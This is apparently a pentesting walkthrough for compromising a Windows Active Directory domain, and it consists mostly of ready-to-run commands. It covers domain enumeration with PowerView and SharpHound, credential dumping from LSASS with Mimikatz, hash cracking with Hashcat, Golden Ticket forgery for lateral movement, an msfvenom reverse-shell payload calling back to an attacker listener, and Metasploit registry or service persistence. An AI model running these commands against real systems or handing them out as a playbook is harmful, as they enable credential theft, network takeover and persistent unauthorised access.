After getting a foot in the door in a pentesting scenario or competition, it is time to gather more data and credentials and to create persistence:
- PowerView – Enumerating the domain.
- SharpHound – Collecting users, groups, computers, sessions and ACLs from the DC and every domain-joined host (noisy; this is the "hammering" step).
- BloodHound – Analysing the extracted data from the domain.
- Mimikatz – Dumping hashes.
- Hashcat – Cracking the dumped hashes.
- Golden Ticket – Getting access to other machines.
- Msfvenom – Crafting a payload.
- Metasploit – Getting the reverse shell and creating persistence.
Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]. From a cmd prompt, start PowerShell with the execution policy bypassed and dot-source the script so its functions are loaded into the session:
powershell -ep bypass
. .\PATH\PowerView.ps1
Enumerate Domain Users
Get-NetUser | select cn
Enumerate Computers
Get-NetComputer -fulldata | select operatingsystem
Enumerate Groups
Get-NetGroup -GroupName *admin*
Enumerate Shares
Invoke-ShareFinder
Collect the data for BloodHound from any computer joined to the domain with the SharpHound collector. -CollectionMethod All also queries every host for sessions and local group membership, so expect it to be noisy on the network:
powershell -ep bypass
. .\PATH\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip
Copy the file over to the attacker’s machine.
Explore the domain with BloodHound. Neo4j is just the database used by BloodHound.
Installing the tool on the attacker machine and starting the database:
sudo apt install bloodhound neo4j -y
sudo neo4j console
The default credentials for the database are neo4j:neo4j. Navigate to http://localhost:7474/ and change the default password.
Then execute the BloodHound application:
bloodhound
Click on the import button or simply drag and drop the .zip file.
On the left menu, look for Queries / Analysis.
Dumping hashes with Mimikatz. lsadump::lsa /patch reads the NT hashes of every domain account from LSASS, so it must run as a local administrator on a domain controller; privilege::debug grants the SeDebugPrivilege it needs:
mimikatz.exe
privilege::debug
lsadump::lsa /patch
Cracking the dumped hashes with Hashcat (-m 1000 is the NTLM mode; hashes.lst holds one NT hash per line):
hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt
Creating a Golden Ticket with Mimikatz. The ticket is forged with the NT hash of the krbtgt account, so dump that account first. /sid is the domain SID (shown on the Domain line of the lsadump output; the value below is a placeholder), /krbtgt is the krbtgt NT hash, /id:500 is the RID of the built-in Administrator, and /ptt injects the forged ticket into the current logon session so that misc::cmd opens a window that already carries it:
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 /ptt
misc::cmd
Getting access to other machines with the Golden Ticket from the newly opened window (use the hostname, not the IP, so Kerberos rather than NTLM is negotiated):
dir \\ComputerA\c$
CREATING PERSISTENCE
Crafting a payload with Msfvenom (LHOST and LPORT are the address the attacker's listener will be bound to):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe
On the attacker side start a listener with Metasploit – Module Library available at [Link]. LHOST and LPORT must match the values baked into the payload; -j runs the handler as a background job so the console stays free:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.10.99
set LPORT 4444
run -j
Applying persistence to the granted Meterpreter session with the Persistent Registry Startup Payload Installer (list the sessions, point the module at the right one, then run it):
use exploit/windows/local/persistence
sessions
set SESSION 1
run
See also exploit/windows/local/persistence_service for Persistent Service Installer.